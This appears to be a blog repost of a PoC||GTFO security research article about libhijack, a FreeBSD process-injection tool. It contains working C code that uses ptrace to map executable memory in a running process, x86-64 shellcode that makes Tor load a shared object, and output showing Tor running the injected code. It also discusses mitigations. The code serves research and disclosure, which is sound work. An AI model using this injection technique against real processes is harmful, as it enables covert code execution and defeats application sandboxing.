It is with pride and pleasure that we announce that SoldierX's libhijack was featured in PoC||GTFO 0x17. Shawn Webb, the author of both libhijack and the article, spent months writing the article and going through a private peer review process.
The unedited version is posted below. The full issue can be found here (warning: large polyglot PDF). I hope you enjoy the article.

Hijacking Your Free Beasties
============================

In the land of red devils known as Beasties exists a system devoid of
meaningful exploit mitigations. As we explore this vast land of
opportunity, we will meet our ELFish friends, [p]tracing their very
moves in order to hijack them. Since unprivileged process debugging is
enabled by default on FreeBSD, we can abuse PTrace to create anonymous
memory mappings, inject code into them, and overwrite PLT/GOT entries.
We will revive a tool called libhijack to make our nefarious activities
of hijacking ELFs via PTrace relatively easy.

Nothing presented here is technically new. However, this type of work
has not been documented in this much detail, tying it all into one
cohesive work. In Phrack 56, Silvio Cesare taught us ELF research
enthusiasts how to hook the PLT/GOT. The Phrack 59 article on Runtime
Process Infection briefly introduces the concept of injecting shared
objects by injecting shellcode via PTrace that calls dlopen(). No other
piece of research, however, has discovered the joys of forcing the
application to create anonymous memory mappings in which to inject code.

This is only part one of a series of planned articles that will follow
libhijack's development. The end goal is to be able to anonymously
inject shared objects. The libhijack project is maintained by the
SoldierX community.

Previous Research
-----------------

All prior work injects code into the stack, the heap, or existing
executable code. All three methods create issues on today's systems. On
amd64 and arm64, the two architectures libhijack cares about, the stack
is non-executable by default. jemalloc, the heap implementation on
FreeBSD, creates non-executable mappings. Obviously overwriting existing
executable code destroys a part of the executable image.

PLT/GOT redirection attacks have proven extremely useful, so much so
that RELRO is a standard mitigation on hardened systems.
Thankfully for us as attackers, FreeBSD doesn't use read-only
relocations. And even if FreeBSD did, using PTrace to do devious things
negates RELRO as PTrace gives us God-like capabilities. We will see the
strength of PaX NOEXEC in HardenedBSD, preventing PLT/GOT redirections
and executable code injections.

The Role of ELF
---------------

FreeBSD provides a nifty API for inspecting the entire virtual memory
space of an application. The results returned from the API tell us the
protection flags (readable, writable, executable) of each mapping. If
FreeBSD provides such a rich API, why would we need to parse the ELF
headers?

We want to ensure that we find the address of the system call
instruction ("syscall" on amd64, "svc 0" on arm64) in a valid memory
location. We want to ensure the proper alignment restrictions are met
(amd64: 1 byte, arm64: 8 bytes). Ensuring proper alignment is important.
If the execution is redirected to an improperly aligned instruction, the
CPU will abort the application (SIGBUS or SIGILL will be raised on
FreeBSD). Intel-based architectures, like amd64, do not care about
instruction alignment, hence the 1 byte alignment described above. With
a bit of additional work, we can also ensure that the mmap syscall is
called from the mmap libc function. Though such an algorithm isn't
currently implemented, doing so would be trivial.

PLT/GOT hijacking requires parsing ELF headers. One would not be able to
find the PLT/GOT without iterating through the Program Headers to find
the Dynamic Headers, eventually ending up with the DT_PLTGOT entry.

We make heavy use of the Struct_Obj_Entry structure, which is the second
PLT/GOT entry. Indeed, in a future version of libhijack, we will likely
handcraft our own Struct_Obj_Entry object and insert that into the real
RTLD in order to allow the shared object to resolve symbols via normal
methods.

Thus, involving ELF early on through the process works to our advantage.
With FreeBSD's libprocstat API, we don't have a need for parsing ELF
headers until we get to the PLT/GOT stage, but doing so early makes it
easier for the attacker using libhijack. libhijack does all the heavy
lifting.

Finding the Base Address
------------------------

Executables come in two flavors: Position-Independent Executables (PIEs)
or regular executables. Since FreeBSD does not have any form of address
space randomization (ASR or ASLR), FreeBSD does not ship any application
built as a PIE.

Because the base address of an application can change depending on
architecture, compiler/linker flags, and PIE status, libhijack needs to
find a way to determine the base address of the executable. The base
address contains the main ELF headers.

libhijack uses the libprocstat API to find the base address. The
following table shows default load addresses for PIEs and non-PIEs on
amd64 and arm64:

---------------------------------------------------
| Arch  | PIE                | non-PIE            |
---------------------------------------------------
| amd64 | 0x0000000001021000 | 0x0000000000200000 |
| arm64 | 0x0000000000100000 | 0x0000000000010000 |
---------------------------------------------------

libhijack will loop through all the memory mappings as returned by the
libprocstat API. Only the first page of each mapping is read in--enough
to check for ELF headers. If the ELF headers are found, then libhijack
assumes that the first ELF object is that of the application.
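
The header check at the heart of that loop can be illustrated locally,
without PTrace. What follows is a minimal sketch, not libhijack's code:
looks_like_elf() and first_elf_index() are hypothetical helpers that
operate on buffers assumed to have already been copied from the start of
each mapping. libhijack itself relies on the IS_ELF macro and on data
read from the target process.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* The four magic bytes that open every ELF image: 0x7f 'E' 'L' 'F'. */
static const unsigned char elf_magic[4] = { 0x7f, 'E', 'L', 'F' };

/*
 * Hypothetical helper (not part of libhijack): report whether a buffer
 * copied from the start of a memory mapping begins with the ELF magic.
 */
bool
looks_like_elf(const unsigned char *buf, size_t len)
{
	assert(buf != NULL);
	if (len < sizeof(elf_magic))
		return (false);
	return (memcmp(buf, elf_magic, sizeof(elf_magic)) == 0);
}

/*
 * Hypothetical helper: return the index of the first buffer that looks
 * like an ELF image, or -1 if none does. This mirrors the "first ELF
 * object is the application" assumption described above.
 */
int
first_elf_index(const unsigned char *const *bufs, const size_t *lens,
    size_t n)
{
	size_t i;

	for (i = 0; i < n; i++) {
		if (looks_like_elf(bufs[i], lens[i]))
			return ((int)i);
	}
	return (-1);
}
```

Only the magic bytes are compared here. A stricter check could also
validate the ELF class and machine fields, at the cost of more parsing.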

static int
resolve_base_address(HIJACK *hijack)
{
	struct procstat *ps;
	struct kinfo_proc *p;
	struct kinfo_vmentry *vm;
	unsigned int i, cnt;
	int err;
	ElfW(Ehdr) *ehdr;

	vm = NULL;
	p = NULL;
	err = ERROR_NONE;
	cnt = 0;

	ps = procstat_open_sysctl();
	if (ps == NULL) {
		SetError(hijack, ERROR_SYSCALL);
		return (-1);
	}

	/* Look up the target process by PID. */
	p = procstat_getprocs(ps, KERN_PROC_PID, hijack->pid, &cnt);
	if (cnt == 0) {
		err = ERROR_SYSCALL;
		goto error;
	}

	/* Fetch the list of memory mappings for the target. */
	cnt = 0;
	vm = procstat_getvmmap(ps, p, &cnt);
	if (cnt == 0) {
		err = ERROR_SYSCALL;
		goto error;
	}

	for (i = 0; i < cnt; i++) {
		/* Only file-backed mappings can hold an ELF image. */
		if (vm[i].kve_type != KVME_TYPE_VNODE)
			continue;

		/* Read the first page and check it for ELF headers. */
		ehdr = read_data(hijack,
		    (unsigned long)(vm[i].kve_start),
		    getpagesize());
		if (ehdr == NULL) {
			goto error;
		}
		if (IS_ELF(*ehdr)) {
			hijack->baseaddr = (unsigned long)(vm[i].kve_start);
			break;
		}
		free(ehdr);
	}

	if (hijack->baseaddr == (unsigned long)NULL)
		err = ERROR_NEEDED;

error:
	if (vm != NULL)
		procstat_freevmmap(ps, vm);
	if (p != NULL)
		procstat_freeprocs(ps, p);
	procstat_close(ps);
	return (err);
}

Assuming that the first ELF object is the application itself, though,
can cause libhijack to break in some corner cases. One such corner case
is when the RTLD is used to execute the application. For example,
instead of calling /bin/ls directly, the user may choose to call
/libexec/ld-elf.so.1 /bin/ls. Doing so causes libhijack to not find the
PLT/GOT and fail early sanity checks. This can be worked around by
telling libhijack the base address to use instead of attempting
auto-detection.

The RTLD in FreeBSD only recently gained the ability to execute
applications directly. Thus, the assumption that the first ELF object is
the application is generally a safe assumption to make.

Finding the syscall
-------------------

As mentioned above, we want to ensure with 100% certainty we're calling
into the kernel from an executable memory mapping and in an allowed
location. The ELF headers tell us all the publicly accessible functions
loaded by a given ELF object.
The application itself may never call into the kernel directly. Instead,
it will rely on shared libraries to do that. The read() system call is a
perfect example. Reading data from a file descriptor is a privileged
operation that requires help from the kernel. The read() libc function
calls the read syscall.

libhijack iterates through the ELF headers, following this pseudocode
algorithm:

1. Locate the first Obj_Entry structure, a linked list that describes
   the loaded shared objects.
2. Iterate through the symbol table for the shared object:
   2.1. If the symbol is not a function, continue to the next symbol or
        break out if no more symbols.
   2.2. Read the symbol's payload into memory. Scan it for the syscall
        opcode modulo instruction alignment.
   2.3. If the instruction alignment is off, continue scanning the
        function.
   2.4. If the syscall opcode is found and the instruction alignment
        requirements are met, return the address of the system call.
3. Restart step #2 with the next Obj_Entry linked list node.

The above algorithm is implemented using a series of callbacks. This is
to encourage an internal API that is flexible and scalable to different
situations.
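
Steps 2.2 through 2.4 can be sketched in isolation. This is an
illustration under stated assumptions rather than libhijack's
implementation: find_aligned_syscall() is a hypothetical helper, the
function body is assumed to have already been copied into a local
buffer, and only the amd64 opcode (0x0f 0x05) is handled.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* amd64 "syscall" instruction encoding: 0x0f 0x05. */
static const unsigned char syscall_opcode[2] = { 0x0f, 0x05 };

/*
 * Hypothetical helper (not libhijack's API): scan a function body that
 * has already been copied into buf, where buf[0] corresponds to address
 * vaddr in the target. Return the target address of the first
 * occurrence of the opcode whose address is a multiple of align, or 0
 * if there is none.
 */
unsigned long
find_aligned_syscall(const unsigned char *buf, size_t len,
    unsigned long vaddr, unsigned int align)
{
	size_t off;

	assert(buf != NULL);
	assert(align != 0);

	for (off = 0; off + sizeof(syscall_opcode) <= len; off++) {
		if (memcmp(buf + off, syscall_opcode,
		    sizeof(syscall_opcode)) != 0)
			continue;
		/* Step 2.3: a hit at a misaligned address is skipped. */
		if ((vaddr + off) % align != 0)
			continue;
		/* Step 2.4: opcode found and alignment satisfied. */
		return (vaddr + off);
	}
	return (0);
}
```

With an alignment of 1, as on amd64, the first byte match always wins.
Larger alignments simply reject hits until one lands on a suitable
address.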

void
freebsd_parse_soe(HIJACK *hijack, struct Struct_Obj_Entry *soe,
    linkmap_callback callback)
{
	int err = 0;
	ElfW(Sym) *libsym = NULL;
	unsigned long numsyms, symaddr = 0, i = 0;
	char *name;

	numsyms = soe->nchains;
	symaddr = (unsigned long)(soe->symtab);

	do {
		if ((libsym))
			free(libsym);

		/* Read the next symbol table entry from the target. */
		libsym = (ElfW(Sym) *)read_data(hijack,
		    (unsigned long)symaddr, sizeof(ElfW(Sym)));
		if (!(libsym)) {
			err = GetErrorCode(hijack);
			goto notfound;
		}

		/* Only functions are of interest. */
		if (ELF64_ST_TYPE(libsym->st_info) != STT_FUNC) {
			symaddr += sizeof(ElfW(Sym));
			continue;
		}

		name = read_str(hijack,
		    (unsigned long)(soe->strtab + libsym->st_name));
		if ((name)) {
			/* Hand the function to the callback. */
			if (callback(hijack, soe, name,
			    ((unsigned long)(soe->mapbase) + libsym->st_value),
			    (size_t)(libsym->st_size)) != CONTPROC) {
				free(name);
				break;
			}
			free(name);
		}

		symaddr += sizeof(ElfW(Sym));
	} while (i++ < numsyms);

notfound:
	SetError(hijack, err);
}

CBRESULT
syscall_callback(HIJACK *hijack, void *linkmap, char *name,
    unsigned long vaddr, size_t sz)
{
	unsigned long syscalladdr;
	unsigned int align;
	size_t left;

	align = GetInstructionAlignment();
	left = sz;

	/* Scan the function body for a properly aligned syscall opcode. */
	while (left > sizeof(SYSCALLSEARCH) - 1) {
		syscalladdr = search_mem(hijack, vaddr, left,
		    SYSCALLSEARCH, sizeof(SYSCALLSEARCH)-1);
		if (syscalladdr == (unsigned long)NULL)
			break;

		if ((syscalladdr % align) == 0) {
			hijack->syscalladdr = syscalladdr;
			return TERMPROC;
		}

		left -= (syscalladdr - vaddr);
		vaddr += (syscalladdr - vaddr) + sizeof(SYSCALLSEARCH)-1;
	}

	return CONTPROC;
}

int
LocateSystemCall(HIJACK *hijack)
{
	Obj_Entry *soe, *next;

	if (IsAttached(hijack) == false)
		return (SetError(hijack, ERROR_NOTATTACHED));

	if (IsFlagSet(hijack, F_DEBUG))
		fprintf(stderr, "[*] Looking for syscall\n");

	/* Walk the Obj_Entry list until a syscall is found. */
	soe = hijack->soe;
	do {
		freebsd_parse_soe(hijack, soe, syscall_callback);
		next = TAILQ_NEXT(soe, next);
		if (soe != hijack->soe)
			free(soe);
		if (hijack->syscalladdr != (unsigned long)NULL)
			break;
		soe = read_data(hijack, (unsigned long)next, sizeof(*soe));
	} while (soe != NULL);

	if (hijack->syscalladdr == (unsigned long)NULL) {
		if (IsFlagSet(hijack, F_DEBUG))
			fprintf(stderr, "[-] Could not find the syscall\n");
		return (SetError(hijack, ERROR_NEEDED));
	}

	if (IsFlagSet(hijack, F_DEBUG))
		fprintf(stderr, "[+] syscall found at 0x%016lx\n",
		    hijack->syscalladdr);

	return (SetError(hijack, ERROR_NONE));
}

Creating a new memory mapping
-----------------------------

Now that we have found the syscall, we can force the application to call
mmap. amd64 and arm64 take slightly different approaches to calling
mmap. On amd64, we simply set the registers, including setting the
instruction pointer, to their respective values. On arm64, we must wait
until the application attempts to call a system call, then set the
registers to their respective values.

Finally, in both cases, we continue execution, waiting for mmap to
finish. Once mmap finishes, we should have our new mapping. mmap will
store the start address of the new memory mapping in rax on amd64 and x0
on arm64. We save this address, restore the registers back to their
previous values, and return the address back to the user.

Below is a handy dandy table for the registers we set:

---------------------------------------
| arch    | register | value          |
---------------------------------------
| amd64   | rax      | syscall number |
| amd64   | rdi      | addr           |
| amd64   | rsi      | length         |
| amd64   | rdx      | prot           |
| amd64   | r10      | flags          |
| amd64   | r8       | fd (-1)        |
| amd64   | r9       | offset (0)     |
| aarch64 | x0       | syscall number |
| aarch64 | x1       | addr           |
| aarch64 | x2       | length         |
| aarch64 | x3       | prot           |
| aarch64 | x4       | flags          |
| aarch64 | x5       | fd (-1)        |
| aarch64 | x6       | offset (0)     |
| aarch64 | x8       | terminator     |
---------------------------------------

Currently, fd and offset are hardcoded to -1 and 0 respectively. The
point of libhijack is to use anonymous memory mappings.
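
For comparison, the request the target is forced to make is the same one
a program would make for itself with an ordinary mmap call. The
following is a minimal local sketch, not libhijack code:
map_anon_rx_page() is a hypothetical helper, and the read and execute
protection is an assumption chosen to match the case study later in the
article. libhijack instead loads these arguments into the target's
registers via PTrace.

```c
/* Exposes MAP_ANON on glibc under strict -std modes; harmless elsewhere. */
#define _DEFAULT_SOURCE

#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Hypothetical local helper: request one page of anonymous, private
 * memory that is readable and executable. fd is -1 and offset is 0,
 * matching the hardcoded values in the register table above.
 * Returns MAP_FAILED on error.
 */
void *
map_anon_rx_page(void)
{
	long pagesz;

	pagesz = sysconf(_SC_PAGESIZE);
	assert(pagesz > 0);

	return (mmap(NULL, (size_t)pagesz, PROT_READ | PROT_EXEC,
	    MAP_ANON | MAP_PRIVATE, -1, 0));
}
```

The caller is expected to compare the result against MAP_FAILED and to
release the page with munmap when done.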

The implementation of md_map_memory for amd64 looks like this:

unsigned long
md_map_memory(HIJACK *hijack, struct mmap_arg_struct *mmap_args)
{
	REGS regs_backup, *regs;
	unsigned long addr, ret;
	register_t stackp;
	int err, status;

	ret = (unsigned long)NULL;
	err = ERROR_NONE;

	regs = _hijack_malloc(hijack, sizeof(REGS));

	if (ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0) < 0) {
		err = ERROR_SYSCALL;
		goto end;
	}
	memcpy(&regs_backup, regs, sizeof(REGS));

	SetRegister(regs, "syscall", MMAPSYSCALL);
	SetInstructionPointer(regs, hijack->syscalladdr);
	SetRegister(regs, "arg0", mmap_args->addr);
	SetRegister(regs, "arg1", mmap_args->len);
	SetRegister(regs, "arg2", mmap_args->prot);
	SetRegister(regs, "arg3", mmap_args->flags);
	SetRegister(regs, "arg4", -1); /* fd */
	SetRegister(regs, "arg5", 0); /* offset */

	if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)regs, 0) < 0) {
		err = ERROR_SYSCALL;
		goto end;
	}

	/* time to run mmap */
	addr = MMAPSYSCALL;
	while (addr == MMAPSYSCALL) {
		if (ptrace(PT_STEP, hijack->pid, (caddr_t)0, 0) < 0)
			err = ERROR_SYSCALL;
		do {
			waitpid(hijack->pid, &status, 0);
		} while (!WIFSTOPPED(status));

		ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0);
		addr = GetRegister(regs, "ret");
	}

	if ((long)addr == -1) {
		if (IsFlagSet(hijack, F_DEBUG))
			fprintf(stderr, "[-] Could not map address. Calling mmap failed!\n");

		ptrace(PT_SETREGS, hijack->pid, (caddr_t)(&regs_backup), 0);
		err = ERROR_CHILDERROR;
		goto end;
	}

end:
	if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)(&regs_backup), 0) < 0)
		err = ERROR_SYSCALL;

	if (err == ERROR_NONE)
		ret = addr;

	free(regs);
	SetError(hijack, err);
	return (ret);
}

Even though we're going to write to the memory mapping, the protection
level doesn't need to have the write flag set. Remember, with PTrace,
we're gods. FreeBSD will allow us to write to the memory mapping via
PTrace, even if that memory mapping is non-writable.

HardenedBSD, a derivative of FreeBSD, prevents the creation of memory
mappings that are both writable and executable.
If a user attempts to create a memory mapping that is both writable and
executable, the execute bit will be dropped. Similarly, HardenedBSD
prevents upgrading a writable memory mapping to executable with
mprotect. HardenedBSD places these same restrictions on PTrace. As a
result, libhijack is completely mitigated in HardenedBSD.

Hijacking the PLT/GOT
---------------------

Now that we have an anonymous memory mapping we can inject code into,
it's time to look at hijacking the Procedure Linkage Table/Global Offset
Table. PLT/GOT hijacking only works for symbols that have been resolved
by the RTLD in advance. Thus, if the function you want to hijack has not
been called, its address will not be in the PLT/GOT unless BIND_NOW is
active.

The application itself contains its own PLT/GOT. Each shared object it
depends on has its own PLT/GOT as well. For example, libpcap requires
libc. libpcap calls functions in libc and thus needs its own linkage
table to resolve libc functions at runtime.

This is the reason why parsing the ELF headers, looking for functions,
for the system call as detailed above works to our advantage. Along the
way, we get to know certain pieces of info, like where the PLT/GOT is.
libhijack will cache that information along the way.

In order to hijack PLT/GOT entries, we need to know two pieces of
information: the address of the PLT/GOT entry we want to hijack and the
address to point it to. Luckily, libhijack has an API for resolving
functions and their locations in the PLT/GOT.

Once we have those two pieces of information, then hijacking the GOT
entry is simple and straightforward. We just replace the entry in the
GOT with the new address. Ideally, the injected code would first stash
the original address for later use.

Case Study: Tor Capsicumization
-------------------------------

Capsicum is a capabilities framework for FreeBSD. It's commonly used to
implement application sandboxing.
HardenedBSD is actively working on integrating Capsicum for Tor. Tor
currently supports a sandboxing methodology that is wholly incompatible
with Capsicum. Tor's sandboxing model uses seccomp2, a filtering-based
sandbox. When Tor starts up, Tor tells its sandbox initialization
routines to whitelist certain resources followed by activation of the
sandbox. Tor then can call open(2), stat(2), etc. on demand.

In order to prevent a full rewrite of Tor to handle Capsicum,
HardenedBSD has opted to use wrappers around so-called "privileged
operation" function calls (i.e., open(2), stat(2), etc.). Thus, open(2)
becomes sandbox_open().

Prior to entering capabilities mode (capmode for short), Tor will
pre-open any directories within which it expects to open files. Any time
Tor expects to open a file, it will call openat rather than open. Thus,
Tor is limited to using files within the directories it uses. For this
reason, we will place the shared object within Tor's data directory.
This is not unreasonable, since we either must be root or running as the
same user as the tor daemon in order to use libhijack against it.

Note that as of the time of this writing, the Capsicum patch to Tor has
not landed upstream and is in a separate repository. The
work-in-progress code can be found here:

https://github.com/lattera/tor/tree/hardening/capsicum

Since FreeBSD does not implement any meaningful exploit mitigation
outside of arguably ineffective stack cookies, an attacker can abuse
memory corruption vulnerabilities to use ret2libc style attacks against
wrapper-style capsicumized applications with 100% reliability. Instead
of ret2open, all the attacker needs to do is ret2sandbox_open. Without
exploit mitigations like PaX ASLR, PaX NOEXEC, and/or CFI, the following
code can be used copy/paste style, allowing for mass exploitation
without payload modification.

To illustrate the need for ASLR and NOEXEC, we will use libhijack to
emulate a vulnerability exploitation resulting in a control flow hijack.
Note that by using libhijack, we bypass the forward-edge guarantees CFI
gives us. llvm's implementation of CFI does not include backward-edge
guarantees. We could gain backward-edge guarantees through SafeStack;
however, Tor immediately crashes when compiled with both CFI and
SafeStack.

In the following code snippet, we perform the following:

1. We attach to the victim process.
2. We create an anonymous memory allocation with read and execute
   privileges.
3. We write the filename that we'll pass to sandbox_open() into the
   beginning of the allocation.
4. We inject the shellcode into the allocation, just after the
   filename.
5. We execute the shellcode and detach from the process.
6. The following pertains now to the shellcode:
7. We call sandbox_open. The address is hardcoded and can be reused
   among like systems.
8. We save the return value of sandbox_open, which will be the opened
   file descriptor.
9. We pass the file descriptor to fdlopen. The address of fdlopen is
   hardcoded and can be reused on like systems.
10. The RTLD loads the shared object.
    10.1. Part of loading is calling any initialization routines. In
          this case, a simple string is printed to the console.

/* main.c */
#include <sys/types.h>
#include <sys/mman.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include "hijack.h"	/* libhijack API; header name is an assumption */

#define MMAP_HINT	0x4000UL

void
usage(char *name)
{
	fprintf(stderr, "USAGE: %s\n", name);
	exit(0);
}

int
main(int argc, char *argv[])
{
	unsigned long addr, ptr;
	HIJACK *ctx;

	if (argc != 4)
		usage(argv[0]);

	/* argv[1]: victim PID */
	ctx = InitHijack(F_DEFAULT);
	AssignPid(ctx, (pid_t)atoi(argv[1]));

	if (Attach(ctx)) {
		fprintf(stderr, "[-] Could not attach!\n");
		exit(1);
	}

	LocateSystemCall(ctx);

	/* Create the anonymous read/execute mapping in the victim. */
	addr = MapMemory(ctx, MMAP_HINT, getpagesize(),
	    PROT_READ | PROT_EXEC,
	    MAP_FIXED | MAP_ANON | MAP_PRIVATE);
	if (addr == (unsigned long)-1) {
		fprintf(stderr, "[-] Could not map memory!\n");
		Detach(ctx);
		exit(1);
	}

	/* argv[3]: filename, written at the start of the mapping. */
	ptr = addr;
	WriteData(ctx, addr, argv[3], strlen(argv[3])+1);
	ptr += strlen(argv[3]) + 1;

	/* argv[2]: shellcode, injected just after the filename. */
	InjectShellcodeAndRun(ctx, ptr, argv[2], true);

	Detach(ctx);
	return (0);
}
/* end of main.c */

/* sandbox_fdlopen.asm */
BITS 64

mov rbp, rsp

; Save registers
push rdi
push rsi
push rdx
push rcx
push rax

; Call sandbox_open
mov rdi, 0x4000
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
mov rax, 0x00000000011c4070 ; Address of sandbox_open
call rax

; Call fdlopen
mov rdi, rax
mov rsi, 0x101
mov rax, 0x8014c3670 ; Address of fdlopen
call rax

; Restore registers
pop rax
pop rcx
pop rdx
pop rsi
pop rdi

mov rsp, rbp
ret
/* end of sandbox_fdlopen.asm */

/* testso.c */
#include <stdio.h>

__attribute__((constructor))
void
init(void)
{
	printf("This output is from an injected shared object. You have been pwned.\n");
}
/* end of testso.c */

Output of Tor:

Oct 04 18:59:25.976 [notice] Tor 0.3.2.2-alpha running on FreeBSD with Libevent 2.1.8-stable, OpenSSL 1.0.2k-freebsd, Zlib 1.2.11, Liblzma N/A, and Libzstd N/A.
Oct 04 18:59:25.976 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Oct 04 18:59:25.976 [notice] This version is not a stable Tor release. Expect more bugs than usual.
Oct 04 18:59:25.977 [notice] Read configuration file "/home/shawn/installs/etc/tor/torrc".
Oct 04 18:59:25.982 [notice] Scheduler type KISTLite has been enabled.
Oct 04 18:59:25.982 [notice] Opening Socks listener on 127.0.0.1:9050
Oct 04 18:59:25.000 [notice] Parsing GEOIP IPv4 file /home/shawn/installs/share/tor/geoip.
Oct 04 18:59:26.000 [notice] Parsing GEOIP IPv6 file /home/shawn/installs/share/tor/geoip6.
Oct 04 18:59:26.000 [notice] Bootstrapped 0%: Starting
Oct 04 18:59:27.000 [notice] Starting with guard context "default"
Oct 04 18:59:27.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Oct 04 18:59:28.000 [notice] Bootstrapped 85%: Finishing handshake with first hop
Oct 04 18:59:29.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Oct 04 18:59:31.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Oct 04 18:59:31.000 [notice] Bootstrapped 100%: Done
This output is from an injected shared object. You have been pwned.

The Future of libhijack
-----------------------

Writing devious code in assembly is cumbersome. Assembly doesn't scale
well to multiple architectures. Instead, we would like to write our
devious code in C, compiling to a shared object that gets injected
anonymously. This requires writing a remote RTLD within libhijack and is
in progress. Writing a remote RTLD will take a while as doing so is not
an easy task.

Additionally, creation of a general-purpose helper library that gets
injected would be helpful. It could aid in PLT/GOT redirection attacks,
possibly storing the addresses of functions we've previously hijacked.
This work is dependent on the remote RTLD.

libhijack currently lacks documentation. Once the ABI and API stabilize,
formal documentation will be written.

Conclusion
----------

Using libhijack, we can easily create anonymous memory mappings, inject
into them arbitrary code, and hijack the PLT/GOT on FreeBSD. On
HardenedBSD, a hardened derivative of FreeBSD, libhijack is fully
mitigated through PaX NOEXEC.

We've demonstrated that wrapper-style Capsicum is ineffective on
FreeBSD.
Through the use of libhijack, we emulate a control flow hijack in which
the application is forced to call sandbox_open and fdlopen on the
resulting file descriptor.

Anonymous injection of full shared objects, along with their
dependencies, will be supported in the future. Imagine injecting libpcap
into Apache to sniff traffic whenever "GET /pcap" is sent.

In order to prevent abuse of PTrace, FreeBSD should set the
security.bsd.unprivileged_proc_debug sysctl to 0 by default. In order to
prevent process manipulation, FreeBSD should implement PaX NOEXEC.

libhijack can be found at https://github.com/SoldierX/libhijack